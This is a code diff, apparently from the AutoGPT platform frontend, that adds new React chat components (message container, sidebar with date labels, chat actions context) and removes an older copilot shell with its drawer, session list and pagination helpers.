+    return (
+      // eslint-disable-next-line @next/next/no-img-element
+      <img
+        src={src}
+        alt={alt || "Image"}
+        className={mediaClass}
+        loading="lazy"
+        onError={() => {
+          if (isWorkspace) setImgFailed(true);
+        }}
+        {...rest}
+      />
+    );
+  }
+
+  return (
+    <span className="my-2 inline-block">
+      <video controls className={mediaClass} preload="metadata">
+        <source src={src} />
+        Your browser does not support the video tag.
+      </video>
+    </span>
+  );
+}
+
+/** Stable components override for Streamdown (avoids re-creating on every render). */
+const STREAMDOWN_COMPONENTS = { img: WorkspaceMediaImage };
+
+const THINKING_PHRASES = [
+  "Thinking...",
+  "Considering this...",
+  "Working through this...",
+  "Analyzing your request...",
+  "Reasoning...",
+  "Looking into it...",
+  "Processing your request...",
+  "Mulling this over...",
+  "Piecing it together...",
+  "On it...",
+];
+
+function getRandomPhrase() {
+  return THINKING_PHRASES[Math.trunc(Math.random() * THINKING_PHRASES.length)];
+}
+
+interface ChatMessagesContainerProps {
+  messages: UIMessage<unknown, UIDataTypes, UITools>[];
+  status: string;
+  error: Error | undefined;
+  isLoading: boolean;
+}
+
+/** Renders chat messages, a "thinking" placeholder and the error state. */
+export const ChatMessagesContainer = ({
+  messages,
+  status,
+  error,
+  isLoading,
+}: ChatMessagesContainerProps) => {
+  const [thinkingPhrase, setThinkingPhrase] = useState(getRandomPhrase);
+  const lastToastTimeRef = useRef(0); // Date.now() of the last error toast
+
+  useEffect(() => {
+    if (status === "submitted") {
+      setThinkingPhrase(getRandomPhrase());
+    }
+  }, [status]);
+  // Toast each new error, but at most once every 3 seconds to avoid spam
+  useEffect(() => {
+    if (!error) return;
+    const now = Date.now();
+    if (now - lastToastTimeRef.current < 3_000) return;
+    lastToastTimeRef.current = now;
+    toast({
+      variant: "destructive",
+      title: "Something went wrong",
+      description:
+        "The assistant encountered an error. Please try sending your message again.",
+    });
+  }, [error]);
+
+  const lastMessage = messages[messages.length - 1];
+  const lastAssistantHasVisibleContent =
+    lastMessage?.role === "assistant" &&
+    lastMessage.parts.some(
+      (p) =>
+        (p.type === "text" && p.text.trim().length > 0) ||
+        p.type.startsWith("tool-"),
+    );
+
+  const showThinking =
+    status === "submitted" ||
+    (status === "streaming" && !lastAssistantHasVisibleContent);
+
+  return (
+    <Conversation className="min-h-0 flex-1">
+      <ConversationContent className="flex min-h-screen flex-1 flex-col gap-6 px-3 py-6">
+        {isLoading && messages.length === 0 && (
+          <div className="flex min-h-full flex-1 items-center justify-center">
+            <LoadingSpinner className="text-neutral-600" />
+          </div>
+        )}
+        {messages.map((message, messageIndex) => {
+          const isLastAssistant =
+            messageIndex === messages.length - 1 &&
+            message.role === "assistant";
+          const messageHasVisibleContent = message.parts.some(
+            (p) =>
+              (p.type === "text" && p.text.trim().length > 0) ||
+              p.type.startsWith("tool-"),
+          );
+
+          return (
+            <Message from={message.role} key={message.id}>
+              <MessageContent
+                className={
+                  "text-[1rem] leading-relaxed " +
+                  "group-[.is-user]:rounded-xl group-[.is-user]:bg-purple-100 group-[.is-user]:px-3 group-[.is-user]:py-2.5 group-[.is-user]:text-slate-900 group-[.is-user]:[border-bottom-right-radius:0] " +
+                  "group-[.is-assistant]:bg-transparent group-[.is-assistant]:text-slate-900"
+                }
+              >
+                {message.parts.map((part, i) => {
+                  switch (part.type) {
+                    case "text":
+                      return (
+                        <MessageResponse
+                          key={`${message.id}-${i}`}
+                          components={STREAMDOWN_COMPONENTS}
+                        >
+                          {resolveWorkspaceUrls(part.text)}
+                        </MessageResponse>
+                      );
+                    case "tool-find_block":
+                      return (
+                        <FindBlocksTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-find_agent":
+                    case "tool-find_library_agent":
+                      return (
+                        <FindAgentsTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-search_docs":
+                    case "tool-get_doc_page":
+                      return (
+                        <SearchDocsTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-run_block":
+                      return (
+                        <RunBlockTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-run_agent":
+                    case "tool-schedule_agent":
+                      return (
+                        <RunAgentTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-create_agent":
+                      return (
+                        <CreateAgentTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-edit_agent":
+                      return (
+                        <EditAgentTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    case "tool-view_agent_output":
+                      return (
+                        <ViewAgentOutputTool
+                          key={`${message.id}-${i}`}
+                          part={part as ToolUIPart}
+                        />
+                      );
+                    default:
+                      // Any other "tool-*" part (SDK built-in tools such as Read,
+                      // Glob, Grep, or an unrecognized tool) gets a generic indicator
+                      if (part.type.startsWith("tool-")) {
+                        return (
+                          <GenericTool
+                            key={`${message.id}-${i}`}
+                            part={part as ToolUIPart}
+                          />
+                        );
+                      }
+                      return null;
+                  }
+                })}
+                {isLastAssistant &&
+                  !messageHasVisibleContent &&
+                  showThinking && (
+                    <span className="inline-block animate-shimmer bg-gradient-to-r from-neutral-400 via-neutral-600 to-neutral-400 bg-[length:200%_100%] bg-clip-text text-transparent">
+                      {thinkingPhrase}
+                    </span>
+                  )}
+              </MessageContent>
+            </Message>
+          );
+        })}
+        {showThinking && lastMessage?.role !== "assistant" && (
+          <Message from="assistant">
+            <MessageContent className="text-[1rem] leading-relaxed">
+              <span className="inline-block animate-shimmer bg-gradient-to-r from-neutral-400 via-neutral-600 to-neutral-400 bg-[length:200%_100%] bg-clip-text text-transparent">
+                {thinkingPhrase}
+              </span>
+            </MessageContent>
+          </Message>
+        )}
+        {error && (
+          <div className="rounded-lg bg-red-50 p-4 text-sm text-red-700">
+            <p className="font-medium">Something went wrong</p>
+            <p className="mt-1 text-red-600">
+              The assistant encountered an error. Please try sending your
+              message again.
+            </p>
+          </div>
+        )}
+      </ConversationContent>
+      <ConversationScrollButton />
+    </Conversation>
+  );
+};
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatSidebar/ChatSidebar.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatSidebar/ChatSidebar.tsx
@@ -0,0 +1,188 @@
+"use client";
+import { useGetV2ListSessions } from "@/app/api/__generated__/endpoints/chat/chat";
+import { Button } from "@/components/atoms/Button/Button";
+import { LoadingSpinner } from "@/components/atoms/LoadingSpinner/LoadingSpinner";
+import { Text } from "@/components/atoms/Text/Text";
+import {
+  Sidebar,
+  SidebarContent,
+  SidebarFooter,
+  SidebarHeader,
+  SidebarTrigger,
+  useSidebar,
+} from "@/components/ui/sidebar";
+import { cn } from "@/lib/utils";
+import { PlusCircleIcon, PlusIcon } from "@phosphor-icons/react";
+import { motion } from "framer-motion";
+import { parseAsString, useQueryState } from "nuqs";
+
+export function ChatSidebar() {
+  const { state } = useSidebar();
+  const isCollapsed = state === "collapsed";
+  const [sessionId, setSessionId] = useQueryState("sessionId", parseAsString);
+
+  const { data: sessionsResponse, isLoading: isLoadingSessions } =
+    useGetV2ListSessions({ limit: 50 });
+
+  const sessions =
+    sessionsResponse?.status === 200 ? sessionsResponse.data.sessions : [];
+
+  function handleNewChat() {
+    setSessionId(null);
+  }
+
+  function handleSelectSession(id: string) {
+    setSessionId(id);
+  }
+
+  /**
+   * Labels a timestamp "Today", "Yesterday" or "N days ago" (local calendar
+   * days, past week), else like "3rd Feb 2026"; "" if it cannot be parsed.
+   */
+  function formatDate(dateString: string) {
+    const date = new Date(dateString);
+    if (Number.isNaN(date.getTime())) return "";
+    // Whole-day index of a local calendar date; Date.UTC sidesteps DST shifts.
+    const dayIndex = (d: Date) =>
+      Date.UTC(d.getFullYear(), d.getMonth(), d.getDate()) / 86_400_000;
+    const diffDays = dayIndex(new Date()) - dayIndex(date);
+
+    // Future timestamps (negative diff) fall through to the absolute date.
+    if (diffDays === 0) return "Today";
+    if (diffDays === 1) return "Yesterday";
+    if (diffDays > 1 && diffDays < 7) return `${diffDays} days ago`;
+
+    const day = date.getDate();
+    const ordinal =
+      day % 10 === 1 && day !== 11
+        ? "st"
+        : day % 10 === 2 && day !== 12
+          ? "nd"
+          : day % 10 === 3 && day !== 13
+            ? "rd"
+            : "th";
+    const month = date.toLocaleDateString("en-US", { month: "short" });
+    const year = date.getFullYear();
+
+    return `${day}${ordinal} ${month} ${year}`;
+  }
+
+  return (
+    <Sidebar
+      variant="inset"
+      collapsible="icon"
+      className="!top-[50px] !h-[calc(100vh-50px)] border-r border-zinc-100 px-0"
+    >
+      {isCollapsed && (
+        <SidebarHeader className="flex flex-row items-center justify-between gap-y-4 md:flex-col md:items-start md:justify-start">
+          <motion.div
+            key="header-collapsed"
+            className="flex flex-col items-center gap-3 pt-4"
+            initial={{ opacity: 0, filter: "blur(3px)" }}
+            animate={{ opacity: 1, filter: "blur(0px)" }}
+            transition={{ type: "spring", bounce: 0.2 }}
+          >
+            <div className="flex flex-col items-center gap-2">
+              <SidebarTrigger />
+              <Button
+                variant="ghost"
+                onClick={handleNewChat}
+                style={{ minWidth: "auto", width: "auto" }}
+              >
+                <PlusCircleIcon className="!size-5" />
+                <span className="sr-only">New Chat</span>
+              </Button>
+            </div>
+          </motion.div>
+        </SidebarHeader>
+      )}
+      <SidebarContent className="gap-4 overflow-y-auto px-4 py-4 [-ms-overflow-style:none] [scrollbar-width:none] [&::-webkit-scrollbar]:hidden">
+        {!isCollapsed && (
+          <motion.div
+            initial={{ opacity: 0 }}
+            animate={{ opacity: 1 }}
+            transition={{ duration: 0.2, delay: 0.1 }}
+            className="flex items-center justify-between px-3"
+          >
+            <Text variant="h3" size="body-medium">
+              Your chats
+            </Text>
+            <div className="relative left-6">
+              <SidebarTrigger />
+            </div>
+          </motion.div>
+        )}
+
+        {!isCollapsed && (
+          <motion.div
+            initial={{ opacity: 0 }}
+            animate={{ opacity: 1 }}
+            transition={{ duration: 0.2, delay: 0.15 }}
+            className="mt-4 flex flex-col gap-1"
+          >
+            {isLoadingSessions ? (
+              <div className="flex min-h-[30rem] items-center justify-center py-4">
+                <LoadingSpinner size="small" className="text-neutral-600" />
+              </div>
+            ) : sessions.length === 0 ? (
+              <p className="py-4 text-center text-sm text-neutral-500">
+                No conversations yet
+              </p>
+            ) : (
+              sessions.map((session) => (
+                <button
+                  key={session.id}
+                  onClick={() => handleSelectSession(session.id)}
+                  className={cn(
+                    "w-full rounded-lg px-3 py-2.5 text-left transition-colors",
+                    session.id === sessionId
+                      ? "bg-zinc-100"
+                      : "hover:bg-zinc-50",
+                  )}
+                >
+                  <div className="flex min-w-0 max-w-full flex-col overflow-hidden">
+                    <div className="min-w-0 max-w-full">
+                      <Text
+                        variant="body"
+                        className={cn(
+                          "truncate font-normal",
+                          session.id === sessionId
+                            ? "text-zinc-600"
+                            : "text-zinc-800",
+                        )}
+                      >
+                        {session.title || `Untitled chat`}
+                      </Text>
+                    </div>
+                    <Text variant="small" className="text-neutral-400">
+                      {formatDate(session.updated_at)}
+                    </Text>
+                  </div>
+                </button>
+              ))
+            )}
+          </motion.div>
+        )}
+      </SidebarContent>
+      {!isCollapsed && sessionId && (
+        <SidebarFooter className="shrink-0 bg-zinc-50 p-3 pb-1 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
+          <motion.div
+            initial={{ opacity: 0 }}
+            animate={{ opacity: 1 }}
+            transition={{ duration: 0.2, delay: 0.2 }}
+          >
+            <Button
+              variant="primary"
+              size="small"
+              onClick={handleNewChat}
+              className="w-full"
+              leftIcon={<PlusIcon className="h-4 w-4" weight="bold" />}
+            >
+              New Chat
+            </Button>
+          </motion.div>
+        </SidebarFooter>
+      )}
+    </Sidebar>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotChatActionsProvider/CopilotChatActionsProvider.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotChatActionsProvider/CopilotChatActionsProvider.tsx
@@ -0,0 +1,16 @@
+"use client";
+
+import { CopilotChatActionsContext } from "./useCopilotChatActions";
+
+interface Props {
+  onSend: (message: string) => void | Promise<void>;
+  children: React.ReactNode;
+}
+
+/** Makes the chat `onSend` action available to all descendants via context. */
+export function CopilotChatActionsProvider({ onSend, children }: Props) {
+  const { Provider } = CopilotChatActionsContext;
+  const actions = { onSend };
+
+  return <Provider value={actions}>{children}</Provider>;
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotChatActionsProvider/useCopilotChatActions.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotChatActionsProvider/useCopilotChatActions.ts
@@ -0,0 +1,23 @@
+"use client";
+
+import { createContext, useContext } from "react";
+
+interface CopilotChatActions {
+  onSend: (message: string) => void | Promise<void>;
+}
+
+const CopilotChatActionsContext = createContext<CopilotChatActions | null>(
+  null,
+);
+
+/** Reads chat actions from context; throws when no provider is mounted. */
+export function useCopilotChatActions(): CopilotChatActions {
+  const actions = useContext(CopilotChatActionsContext);
+  if (actions) return actions;
+  // A null value is the context default, i.e. no provider above the caller.
+  throw new Error(
+    "useCopilotChatActions must be used within CopilotChatActionsProvider",
+  );
+}
+
+export { CopilotChatActionsContext };
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/CopilotShell.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/CopilotShell.tsx
@@ -1,99 +0,0 @@
-"use client";
-
-import { ChatLoader } from "@/components/contextual/Chat/components/ChatLoader/ChatLoader";
-import { Text } from "@/components/atoms/Text/Text";
-import { NAVBAR_HEIGHT_PX } from "@/lib/constants";
-import type { ReactNode } from "react";
-import { DesktopSidebar } from "./components/DesktopSidebar/DesktopSidebar";
-import { MobileDrawer } from "./components/MobileDrawer/MobileDrawer";
-import { MobileHeader } from "./components/MobileHeader/MobileHeader";
-import { useCopilotShell } from "./useCopilotShell";
-
-interface Props {
-  children: ReactNode;
-}
-
-export function CopilotShell({ children }: Props) {
-  const {
-    isMobile,
-    isDrawerOpen,
-    isLoading,
-    isCreatingSession,
-    isLoggedIn,
-    hasActiveSession,
-    sessions,
-    currentSessionId,
-    handleOpenDrawer,
-    handleCloseDrawer,
-    handleDrawerOpenChange,
-    handleNewChatClick,
-    handleSessionClick,
-    hasNextPage,
-    isFetchingNextPage,
-    fetchNextPage,
-  } = useCopilotShell();
-
-  if (!isLoggedIn) {
-    return (
-      <div className="flex h-full items-center justify-center">
-        <ChatLoader />
-      </div>
-    );
-  }
-
-  return (
-    <div
-      className="flex overflow-hidden bg-[#EFEFF0]"
-      style={{ height: `calc(100vh - ${NAVBAR_HEIGHT_PX}px)` }}
-    >
-      {!isMobile && (
-        <DesktopSidebar
-          sessions={sessions}
-          currentSessionId={currentSessionId}
-          isLoading={isLoading}
-          hasNextPage={hasNextPage}
-          isFetchingNextPage={isFetchingNextPage}
-          onSelectSession={handleSessionClick}
-          onFetchNextPage={fetchNextPage}
-          onNewChat={handleNewChatClick}
-          hasActiveSession={Boolean(hasActiveSession)}
-        />
-      )}
-
-      <div className="relative flex min-h-0 flex-1 flex-col">
-        {isMobile && <MobileHeader onOpenDrawer={handleOpenDrawer} />}
-        <div className="flex min-h-0 flex-1 flex-col">
-          {isCreatingSession ? (
-            <div className="flex h-full flex-1 flex-col items-center justify-center bg-[#f8f8f9]">
-              <div className="flex flex-col items-center gap-4">
-                <ChatLoader />
-                <Text variant="body" className="text-zinc-500">
-                  Creating your chat...
-                </Text>
-              </div>
-            </div>
-          ) : (
-            children
-          )}
-        </div>
-      </div>
-
-      {isMobile && (
-        <MobileDrawer
-          isOpen={isDrawerOpen}
-          sessions={sessions}
-          currentSessionId={currentSessionId}
-          isLoading={isLoading}
-          hasNextPage={hasNextPage}
-          isFetchingNextPage={isFetchingNextPage}
-          onSelectSession={handleSessionClick}
-          onFetchNextPage={fetchNextPage}
-          onNewChat={handleNewChatClick}
-          onClose={handleCloseDrawer}
-          onOpenChange={handleDrawerOpenChange}
-          hasActiveSession={Boolean(hasActiveSession)}
-        />
-      )}
-    </div>
-  );
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/DesktopSidebar/DesktopSidebar.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/DesktopSidebar/DesktopSidebar.tsx
@@ -1,70 +0,0 @@
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { Button } from "@/components/atoms/Button/Button";
-import { Text } from "@/components/atoms/Text/Text";
-import { scrollbarStyles } from "@/components/styles/scrollbars";
-import { cn } from "@/lib/utils";
-import { Plus } from "@phosphor-icons/react";
-import { SessionsList } from "../SessionsList/SessionsList";
-
-interface Props {
-  sessions: SessionSummaryResponse[];
-  currentSessionId: string | null;
-  isLoading: boolean;
-  hasNextPage: boolean;
-  isFetchingNextPage: boolean;
-  onSelectSession: (sessionId: string) => void;
-  onFetchNextPage: () => void;
-  onNewChat: () => void;
-  hasActiveSession: boolean;
-}
-
-export function DesktopSidebar({
-  sessions,
-  currentSessionId,
-  isLoading,
-  hasNextPage,
-  isFetchingNextPage,
-  onSelectSession,
-  onFetchNextPage,
-  onNewChat,
-  hasActiveSession,
-}: Props) {
-  return (
-    <aside className="flex h-full w-80 flex-col border-r border-zinc-100 bg-zinc-50">
-      <div className="shrink-0 px-6 py-4">
-        <Text variant="h3" size="body-medium">
-          Your chats
-        </Text>
-      </div>
-      <div
-        className={cn(
-          "flex min-h-0 flex-1 flex-col overflow-y-auto px-3 py-3",
-          scrollbarStyles,
-        )}
-      >
-        <SessionsList
-          sessions={sessions}
-          currentSessionId={currentSessionId}
-          isLoading={isLoading}
-          hasNextPage={hasNextPage}
-          isFetchingNextPage={isFetchingNextPage}
-          onSelectSession={onSelectSession}
-          onFetchNextPage={onFetchNextPage}
-        />
-      </div>
-      {hasActiveSession && (
-        <div className="shrink-0 bg-zinc-50 p-3 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
-          <Button
-            variant="primary"
-            size="small"
-            onClick={onNewChat}
-            className="w-full"
-            leftIcon={<Plus width="1rem" height="1rem" />}
-          >
-            New Chat
-          </Button>
-        </div>
-      )}
-    </aside>
-  );
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileDrawer/MobileDrawer.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileDrawer/MobileDrawer.tsx
@@ -1,91 +0,0 @@
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { Button } from "@/components/atoms/Button/Button";
-import { scrollbarStyles } from "@/components/styles/scrollbars";
-import { cn } from "@/lib/utils";
-import { PlusIcon, X } from "@phosphor-icons/react";
-import { Drawer } from "vaul";
-import { SessionsList } from "../SessionsList/SessionsList";
-
-interface Props {
-  isOpen: boolean;
-  sessions: SessionSummaryResponse[];
-  currentSessionId: string | null;
-  isLoading: boolean;
-  hasNextPage: boolean;
-  isFetchingNextPage: boolean;
-  onSelectSession: (sessionId: string) => void;
-  onFetchNextPage: () => void;
-  onNewChat: () => void;
-  onClose: () => void;
-  onOpenChange: (open: boolean) => void;
-  hasActiveSession: boolean;
-}
-
-export function MobileDrawer({
-  isOpen,
-  sessions,
-  currentSessionId,
-  isLoading,
-  hasNextPage,
-  isFetchingNextPage,
-  onSelectSession,
-  onFetchNextPage,
-  onNewChat,
-  onClose,
-  onOpenChange,
-  hasActiveSession,
-}: Props) {
-  return (
-    <Drawer.Root open={isOpen} onOpenChange={onOpenChange} direction="left">
-      <Drawer.Portal>
-        <Drawer.Overlay className="fixed inset-0 z-[60] bg-black/10 backdrop-blur-sm" />
-        <Drawer.Content className="fixed left-0 top-0 z-[70] flex h-full w-80 flex-col border-r border-zinc-200 bg-zinc-50">
-          <div className="shrink-0 border-b border-zinc-200 p-4">
-            <div className="flex items-center justify-between">
-              <Drawer.Title className="text-lg font-semibold text-zinc-800">
-                Your chats
-              </Drawer.Title>
-              <Button
-                variant="icon"
-                size="icon"
-                aria-label="Close sessions"
-                onClick={onClose}
-              >
-                <X width="1.25rem" height="1.25rem" />
-              </Button>
-            </div>
-          </div>
-          <div
-            className={cn(
-              "flex min-h-0 flex-1 flex-col overflow-y-auto px-3 py-3",
-              scrollbarStyles,
-            )}
-          >
-            <SessionsList
-              sessions={sessions}
-              currentSessionId={currentSessionId}
-              isLoading={isLoading}
-              hasNextPage={hasNextPage}
-              isFetchingNextPage={isFetchingNextPage}
-              onSelectSession={onSelectSession}
-              onFetchNextPage={onFetchNextPage}
-            />
-          </div>
-          {hasActiveSession && (
-            <div className="shrink-0 bg-white p-3 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
-              <Button
-                variant="primary"
-                size="small"
-                onClick={onNewChat}
-                className="w-full"
-                leftIcon={<PlusIcon width="1rem" height="1rem" />}
-              >
-                New Chat
-              </Button>
-            </div>
-          )}
-        </Drawer.Content>
-      </Drawer.Portal>
-    </Drawer.Root>
-  );
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileDrawer/useMobileDrawer.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/MobileDrawer/useMobileDrawer.ts
@@ -1,24 +0,0 @@
-import { useState } from "react";
-
-export function useMobileDrawer() {
-  const [isDrawerOpen, setIsDrawerOpen] = useState(false);
-
-  const handleOpenDrawer = () => {
-    setIsDrawerOpen(true);
-  };
-
-  const handleCloseDrawer = () => {
-    setIsDrawerOpen(false);
-  };
-
-  const handleDrawerOpenChange = (open: boolean) => {
-    setIsDrawerOpen(open);
-  };
-
-  return {
-    isDrawerOpen,
-    handleOpenDrawer,
-    handleCloseDrawer,
-    handleDrawerOpenChange,
-  };
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/SessionsList/SessionsList.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/SessionsList/SessionsList.tsx
@@ -1,80 +0,0 @@
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { Skeleton } from "@/components/__legacy__/ui/skeleton";
-import { Text } from "@/components/atoms/Text/Text";
-import { InfiniteList } from "@/components/molecules/InfiniteList/InfiniteList";
-import { cn } from "@/lib/utils";
-import { getSessionTitle } from "../../helpers";
-
-interface Props {
-  sessions: SessionSummaryResponse[];
-  currentSessionId: string | null;
-  isLoading: boolean;
-  hasNextPage: boolean;
-  isFetchingNextPage: boolean;
-  onSelectSession: (sessionId: string) => void;
-  onFetchNextPage: () => void;
-}
-
-export function SessionsList({
-  sessions,
-  currentSessionId,
-  isLoading,
-  hasNextPage,
-  isFetchingNextPage,
-  onSelectSession,
-  onFetchNextPage,
-}: Props) {
-  if (isLoading) {
-    return (
-      <div className="space-y-1">
-        {Array.from({ length: 5 }).map((_, i) => (
-          <div key={i} className="rounded-lg px-3 py-2.5">
-            <Skeleton className="h-5 w-full" />
-          </div>
-        ))}
-      </div>
-    );
-  }
-
-  if (sessions.length === 0) {
-    return (
-      <div className="flex h-full items-center justify-center">
-        <Text variant="body" className="text-zinc-500">
-          You don&apos;t have previous chats
-        </Text>
-      </div>
-    );
-  }
-
-  return (
-    <InfiniteList
-      items={sessions}
-      hasMore={hasNextPage}
-      isFetchingMore={isFetchingNextPage}
-      onEndReached={onFetchNextPage}
-      className="space-y-1"
-      renderItem={(session) => {
-        const isActive = session.id === currentSessionId;
-        return (
-          <button
-            onClick={() => onSelectSession(session.id)}
-            className={cn(
-              "w-full rounded-lg px-3 py-2.5 text-left transition-colors",
-              isActive ? "bg-zinc-100" : "hover:bg-zinc-50",
-            )}
-          >
-            <Text
-              variant="body"
-              className={cn(
-                "font-normal",
-                isActive ? "text-zinc-600" : "text-zinc-800",
-              )}
-            >
-              {getSessionTitle(session)}
-            </Text>
-          </button>
-        );
-      }}
-    />
-  );
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/SessionsList/useSessionsPagination.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/components/SessionsList/useSessionsPagination.ts
@@ -1,91 +0,0 @@
-import { useGetV2ListSessions } from "@/app/api/__generated__/endpoints/chat/chat";
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { okData } from "@/app/api/helpers";
-import { useEffect, useState } from "react";
-
-const PAGE_SIZE = 50;
-
-export interface UseSessionsPaginationArgs {
-  enabled: boolean;
-}
-
-export function useSessionsPagination({ enabled }: UseSessionsPaginationArgs) {
-  const [offset, setOffset] = useState(0);
-
-  const [accumulatedSessions, setAccumulatedSessions] = useState<
-    SessionSummaryResponse[]
-  >([]);
-
-  const [totalCount, setTotalCount] = useState<number | null>(null);
-
-  const { data, isLoading, isFetching, isError } = useGetV2ListSessions(
-    { limit: PAGE_SIZE, offset },
-    {
-      query: {
-        enabled: enabled && offset >= 0,
-      },
-    },
-  );
-
-  useEffect(() => {
-    const responseData = okData(data);
-    if (responseData) {
-      const newSessions = responseData.sessions;
-      const total = responseData.total;
-      setTotalCount(total);
-
-      if (offset === 0) {
-        setAccumulatedSessions(newSessions);
-      } else {
-        setAccumulatedSessions((prev) => [...prev, ...newSessions]);
-      }
-    } else if (!enabled) {
-      setAccumulatedSessions([]);
-      setTotalCount(null);
-    }
-  }, [data, offset, enabled]);
-
-  const hasNextPage =
-    totalCount !== null && accumulatedSessions.length < totalCount;
-
-  const areAllSessionsLoaded =
-    totalCount !== null &&
-    accumulatedSessions.length >= totalCount &&
-    !isFetching &&
-    !isLoading;
-
-  useEffect(() => {
-    if (
-      hasNextPage &&
-      !isFetching &&
-      !isLoading &&
-      !isError &&
-      totalCount !== null
-    ) {
-      setOffset((prev) => prev + PAGE_SIZE);
-    }
-  }, [hasNextPage, isFetching, isLoading, isError, totalCount]);
-
-  const fetchNextPage = () => {
-    if (hasNextPage && !isFetching) {
-      setOffset((prev) => prev + PAGE_SIZE);
-    }
-  };
-
-  const reset = () => {
-    // Only reset the offset - keep existing sessions visible during refetch
-    // The effect will replace sessions when new data arrives at offset 0
-    setOffset(0);
-  };
-
-  return {
-    sessions: accumulatedSessions,
-    isLoading,
-    isFetching,
-    hasNextPage,
-    areAllSessionsLoaded,
-    totalCount,
-    fetchNextPage,
-    reset,
-  };
-}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/helpers.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/CopilotShell/helpers.ts
@@ -1,106 +0,0 @@
-import type { SessionDetailResponse } from "@/app/api/__generated__/models/sessionDetailResponse";
-import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
-import { format, formatDistanceToNow, isToday } from "date-fns";
-
-export function convertSessionDetailToSummary(session: SessionDetailResponse) {
-  return {
-    id: session.id,
-    created_at: session.created_at,
-    updated_at: session.updated_at,
-    title: undefined,
-  };
-}
-
-export function filterVisibleSessions(sessions: SessionSummaryResponse[]) {
-  const fiveMinutesAgo = Date.now() - 5 * 60 * 1000;
-  return sessions.filter((session) => {
-    const hasBeenUpdated = session.updated_at !== session.created_at;
-
-    if (hasBeenUpdated) return true;
-
-    const isRecentlyCreated =
-      new Date(session.created_at).getTime() > fiveMinutesAgo;
-
-    return isRecentlyCreated;
-  });
-}
-
-export function getSessionTitle(session: SessionSummaryResponse) {
-  if (session.title) return session.title;
-
-  const isNewSession = session.updated_at === session.created_at;
-
-  if (isNewSession) {
-    const createdDate = new Date(session.created_at);
-    if (isToday(createdDate)) {
-      return "Today";
-    }
-    return format(createdDate, "MMM d, yyyy");
-  }
-
-  return "Untitled Chat";
-}
-
-export function getSessionUpdatedLabel(session: SessionSummaryResponse) {
-  if (!session.updated_at) return "";
-  return formatDistanceToNow(new Date(session.updated_at), { addSuffix: true });
-}
-
-export function mergeCurrentSessionIntoList(
-  accumulatedSessions: SessionSummaryResponse[],
-  currentSessionId: string | null,
-  currentSessionData: SessionDetailResponse | null | undefined,
-  recentlyCreatedSessions?: Map<string, SessionSummaryResponse>,
-) {
-  const filteredSessions: SessionSummaryResponse[] = [];
-  const addedIds = new Set<string>();
-
-  if (accumulatedSessions.length > 0) {
-    const visibleSessions = filterVisibleSessions(accumulatedSessions);
-
-    if (currentSessionId) {
-      const currentInAll = accumulatedSessions.find(
-        (s) => s.id === currentSessionId,
-      );
-      if (currentInAll) {
-        const isInVisible = visibleSessions.some(
-          (s) => s.id === currentSessionId,
-        );
-        if (!isInVisible) {
-          filteredSessions.push(currentInAll);
-          addedIds.add(currentInAll.id);
-        }
-      }
-    }
-
-    for (const session of visibleSessions) {
-      if (!addedIds.has(session.id)) {
-        filteredSessions.push(session);
-        addedIds.add(session.id);
-      }
-    }
-  }
-
-  if (currentSessionId && currentSessionData) {
-    if (!addedIds.has(currentSessionId)) {
-      const summarySession = convertSessionDetailToSummary(currentSessionData);
-      filteredSessions.unshift(summarySession);
-      addedIds.add(currentSessionId);
-    }
-  }
-
-  if (recentlyCreatedSessions) {
-    for (const [sessionId, sessionData] of recentlyCreatedSessions) {
-      if (!addedIds.has(sessionId)) {
-        filteredSessions.unshift(sessionData);
-        addedIds.add(sessionId);
-      }
-    }
-  }
-
-  return filteredSessions;
-}
-
-export function getCurrentSessionId(searchParams: URLSearchParams) {
-  return searchParams.get("sessionId");
-}
